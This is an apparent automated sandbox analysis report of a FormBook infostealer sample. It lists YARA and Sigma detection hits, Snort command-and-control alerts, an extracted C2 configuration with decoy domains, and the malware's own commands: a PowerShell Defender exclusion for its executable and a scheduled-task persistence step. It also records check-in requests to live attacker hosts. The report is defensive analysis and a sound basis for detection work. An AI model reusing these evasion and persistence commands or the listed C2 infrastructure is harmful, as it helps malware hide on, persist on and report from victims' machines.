00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: po8909893299832.exe PID: 7572	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x113d:$a1: 3C 30 50 4F 53 54 74 09 40 0x20da8:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: InXlDTKncKkCk.exe PID: 8096	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InXlDTKncKkCk.exe PID: 8096	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x35bb:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: InXlDTKncKkCk.exe PID: 7492	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x14e2f:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: msdt.exe PID: 6360	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x112965:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cscript.exe PID: 5188	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x730cc:$a1: 3C 30 50 4F 53 54 74 09 40 0x141922:$a1: 3C 30 50 4F 53 54 74 09 40 0x175b4e:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 41 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
16.2.InXlDTKncKkCk.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
16.2.InXlDTKncKkCk.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
16.2.InXlDTKncKkCk.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
16.2.InXlDTKncKkCk.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
16.2.InXlDTKncKkCk.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\po8909893299832.exe", ParentImage: C:\Users\user\Desktop\po8909893299832.exe, ParentProcessId: 7572, ParentProcessName: po8909893299832.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe", ProcessId: 7784, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp7E6D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp7E6D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe, ParentImage: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe, ParentProcessId: 8096, ParentProcessName: InXlDTKncKkCk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp7E6D.tmp", ProcessId: 5972, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\po8909893299832.exe", ParentImage: C:\Users\user\Desktop\po8909893299832.exe, ParentProcessId: 7572, ParentProcessName: po8909893299832.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp", ProcessId: 7852, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\po8909893299832.exe", ParentImage: C:\Users\user\Desktop\po8909893299832.exe, ParentProcessId: 7572, ParentProcessName: po8909893299832.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe", ProcessId: 7784, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\po8909893299832.exe", ParentImage: C:\Users\user\Desktop\po8909893299832.exe, ParentProcessId: 7572, ParentProcessName: po8909893299832.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp", ProcessId: 7852, ProcessName: schtasks.exe

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 103.224.212.212

Timestamp:	05/30/24-11:07:48.562948
SID:	2031412
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 3.33.130.190

Timestamp:	05/30/24-11:10:38.980070
SID:	2031412
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 34.92.138.115

Timestamp:	05/30/24-11:09:01.504499
SID:	2031412
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 3.64.163.50

Timestamp:	05/30/24-11:09:58.198716
SID:	2031412
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 188.114.97.3

Timestamp:	05/30/24-11:11:22.799011
SID:	2031412
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 216.246.47.89

Timestamp:	05/30/24-11:09:18.671134
SID:	2031412
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 72.14.178.174

Timestamp:	05/30/24-11:11:43.816589
SID:	2031412
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 103.224.212.212

Timestamp:	05/30/24-11:10:18.476062
SID:	2031412
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 205.134.241.76

Timestamp:	05/30/24-11:10:59.861628
SID:	2031412
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: po8909893299832.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.aquariusbusiness.info/hd05/www.satwaspin.net	Avira URL Cloud: Label: malware
Source: http://www.codyscalls.com/hd05/	Avira URL Cloud: Label: malware
Source: http://www.blogonrunning.com/hd05/www.trexendofparadise.club	Avira URL Cloud: Label: malware
Source: http://www.blogonrunning.com/hd05/www.lezxop.xyz	Avira URL Cloud: Label: malware
Source: http://www.blogonrunning.com	Avira URL Cloud: Label: malware
Source: http://www.1509068.cc/hd05/	Avira URL Cloud: Label: malware
Source: http://www.attack.info	Avira URL Cloud: Label: phishing
Source: http://www.aquariusbusiness.info	Avira URL Cloud: Label: malware
Source: http://www.blogonrunning.com/hd05/?mJBXxJ=L307NeH5fWkLgKK43su7TNgrL3oq/VFX5jHnogZ3Xy90kbIeezXbjunmo4QVhDvcCpqA&_hrl=jxopsZ	Avira URL Cloud: Label: malware
Source: http://www.blogonrunning.com/hd05/	Avira URL Cloud: Label: malware
Source: http://www.aquariusbusiness.info/hd05/	Avira URL Cloud: Label: malware
Source: http://www.attack.info/hd05/	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe

Avira: detection malicious, Label: TR/AD.Swotter.guhjc

Found malware configuration

Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.vagabondtracks.com/hd05/"], "decoy": ["businessjp6-51399.info", "countyyoungpest.com", "taxilasamericas.com", "stairs.parts", "nrgsolutions.us", "cbdgirl.guru", "dropshunter.net", "adorabubble.co.za", "alcohomeexteriors.com", "aquariusbusiness.info", "zaginione.com", "pintoresmajadahonda.com", "fursace.club", "musiletras.co", "carpoboutiquehotel.com", "redacted.investments", "symplywell.me", "lezxop.xyz", "stmbbill.com", "1509068.cc", "savdesign.online", "gaiacoreresearch.com", "pivoluvva-usa.com", "kathrynmirabella.com", "ziplnk.xyz", "furanoikedanouen.com", "regenesisvista.world", "lorenzodavissr.com", "friendlyemporium.com", "7727.info", "moledistillery.com", "geturpdtaemza.com", "sparkfirestarter.net", "q3hjns.shop", "thingsidonaked.com", "attack.info", "salihkaradag.com", "vn6b6q.com", "thierrydoublein.com", "buddhasiddhartha.com", "uniqueofferss.com", "trexendofparadise.club", "evans-gdaddy-test-domain.online", "kgroundx.com", "2us7o.us", "damtherncooling.com", "kakashi-hatake.shop", "blogonrunning.com", "lovepox.com", "ramediatech.online", "satwaspin.net", "greenink.store", "tuskerlogix.com", "codyscalls.com", "system.ngo", "connect-talent.com", "addck.top", "teramilab.com", "yuyuklmn123888yy.xyz", "9orwr6.vip", "nubeqa77.life", "lmpalmour.com", "sandeshkrantinews.in", "find-buildings.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe

ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: po8909893299832.exe	ReversingLabs: Detection: 47%
Source: po8909893299832.exe	Virustotal: Detection: 48%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 16.2.InXlDTKncKkCk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.InXlDTKncKkCk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: po8909893299832.exe

Joe Sandbox ML: detected

Source: po8909893299832.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: po8909893299832.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cscript.pdbUGP source: InXlDTKncKkCk.exe, 00000010.00000002.1496875331.0000000000928000.00000004.00000020.00020000.00000000.sdmp, InXlDTKncKkCk.exe, 00000010.00000002.1501823964.0000000001260000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, 00000012.00000002.3853793986.00000000002D0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: hovp.pdbSHA256 source: po8909893299832.exe, InXlDTKncKkCk.exe.0.dr
Source:	Binary string: msdt.pdbGCTL source: po8909893299832.exe, 00000009.00000002.1499697457.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000011.00000002.1502169284.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: hovp.pdb source: po8909893299832.exe, InXlDTKncKkCk.exe.0.dr
Source:	Binary string: wntdll.pdbUGP source: po8909893299832.exe, 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000002.1503188875.000000000499E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000002.1503188875.0000000004800000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000003.1496732128.00000000044A5000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000011.00000003.1500403493.0000000004654000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000003.1498745033.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000002.3864619593.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000012.00000003.1496170490.0000000004B0D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000002.3864619593.000000000500E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: po8909893299832.exe, po8909893299832.exe, 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000002.1503188875.000000000499E000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000002.1503188875.0000000004800000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000011.00000003.1496732128.00000000044A5000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000011.00000003.1500403493.0000000004654000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000003.1498745033.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000002.3864619593.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000012.00000003.1496170490.0000000004B0D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000012.00000002.3864619593.000000000500E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: po8909893299832.exe, 00000009.00000002.1499697457.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000011.00000002.1502169284.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cscript.pdb source: InXlDTKncKkCk.exe, 00000010.00000002.1496875331.0000000000928000.00000004.00000020.00020000.00000000.sdmp, InXlDTKncKkCk.exe, 00000010.00000002.1501823964.0000000001260000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, 00000012.00000002.3853793986.00000000002D0000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 4x nop then jmp 06BBADA3h	0_2_06BBB1E7
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 4x nop then jmp 0729A05Bh	11_2_0729A49F
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 4x nop then pop esi	16_2_0041732B
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Code function: 4x nop then pop edi	16_2_00416CDC

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49715 -> 103.224.212.212:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49729 -> 34.92.138.115:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49740 -> 216.246.47.89:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49741 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49742 -> 103.224.212.212:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49743 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49749 -> 205.134.241.76:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49756 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49757 -> 72.14.178.174:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.92.138.115 80
Source: C:\Windows\explorer.exe	Network Connect: 216.246.47.89 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.vagabondtracks.com/hd05/

Source: global traffic	HTTP traffic detected: GET /hd05/?uPj8E=nj80vJyxN81&MZd0Q=86lIbpVB0TF+ypCCh2xJS80hbaRwufvG1BxjW4BS/DAeytVMDvWI/cAJk8pGccQXRyse HTTP/1.1Host: www.trexendofparadise.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?mJBXxJ=CxPotulfGBZpHIJJ+o6FWq7i3UE5pskzkmOOhBcvrWJlnc+WUQ0RkkLk4n95vg0rlezt&_hrl=jxopsZ HTTP/1.1Host: www.1509068.ccConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?mJBXxJ=1/AoRKsyvPXt2IBcGLParC7mpiczmRTxS/g2b9eKRAccwmv6VWNs1AH0d5Vdc3+Ur6jA&_hrl=jxopsZ HTTP/1.1Host: www.musiletras.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?mJBXxJ=L307NeH5fWkLgKK43su7TNgrL3oq/VFX5jHnogZ3Xy90kbIeezXbjunmo4QVhDvcCpqA&_hrl=jxopsZ HTTP/1.1Host: www.blogonrunning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?mJBXxJ=86lIbpVB0TF+ypCCh2xJS80hbaRwufvG1BxjW4BS/DAeytVMDvWI/cAJk8pGccQXRyse&_hrl=jxopsZ HTTP/1.1Host: www.trexendofparadise.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 103.224.212.212 103.224.212.212
Source: Joe Sandbox View	IP Address: 3.64.163.50 3.64.163.50

Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: SERVERCENTRALUS SERVERCENTRALUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 10_2_0F8EEF82 getaddrinfo,setsockopt,recv,

10_2_0F8EEF82

Source: global traffic	HTTP traffic detected: GET /hd05/?uPj8E=nj80vJyxN81&MZd0Q=86lIbpVB0TF+ypCCh2xJS80hbaRwufvG1BxjW4BS/DAeytVMDvWI/cAJk8pGccQXRyse HTTP/1.1Host: www.trexendofparadise.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?mJBXxJ=CxPotulfGBZpHIJJ+o6FWq7i3UE5pskzkmOOhBcvrWJlnc+WUQ0RkkLk4n95vg0rlezt&_hrl=jxopsZ HTTP/1.1Host: www.1509068.ccConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?mJBXxJ=1/AoRKsyvPXt2IBcGLParC7mpiczmRTxS/g2b9eKRAccwmv6VWNs1AH0d5Vdc3+Ur6jA&_hrl=jxopsZ HTTP/1.1Host: www.musiletras.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?mJBXxJ=L307NeH5fWkLgKK43su7TNgrL3oq/VFX5jHnogZ3Xy90kbIeezXbjunmo4QVhDvcCpqA&_hrl=jxopsZ HTTP/1.1Host: www.blogonrunning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hd05/?mJBXxJ=86lIbpVB0TF+ypCCh2xJS80hbaRwufvG1BxjW4BS/DAeytVMDvWI/cAJk8pGccQXRyse&_hrl=jxopsZ HTTP/1.1Host: www.trexendofparadise.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.trexendofparadise.club
Source: global traffic	DNS traffic detected: DNS query: www.thingsidonaked.com
Source: global traffic	DNS traffic detected: DNS query: www.lorenzodavissr.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: www.1509068.cc
Source: global traffic	DNS traffic detected: DNS query: www.musiletras.co
Source: global traffic	DNS traffic detected: DNS query: www.connect-talent.com
Source: global traffic	DNS traffic detected: DNS query: www.blogonrunning.com
Source: global traffic	DNS traffic detected: DNS query: www.system.ngo
Source: global traffic	DNS traffic detected: DNS query: www.vagabondtracks.com
Source: global traffic	DNS traffic detected: DNS query: www.damtherncooling.com
Source: global traffic	DNS traffic detected: DNS query: www.attack.info

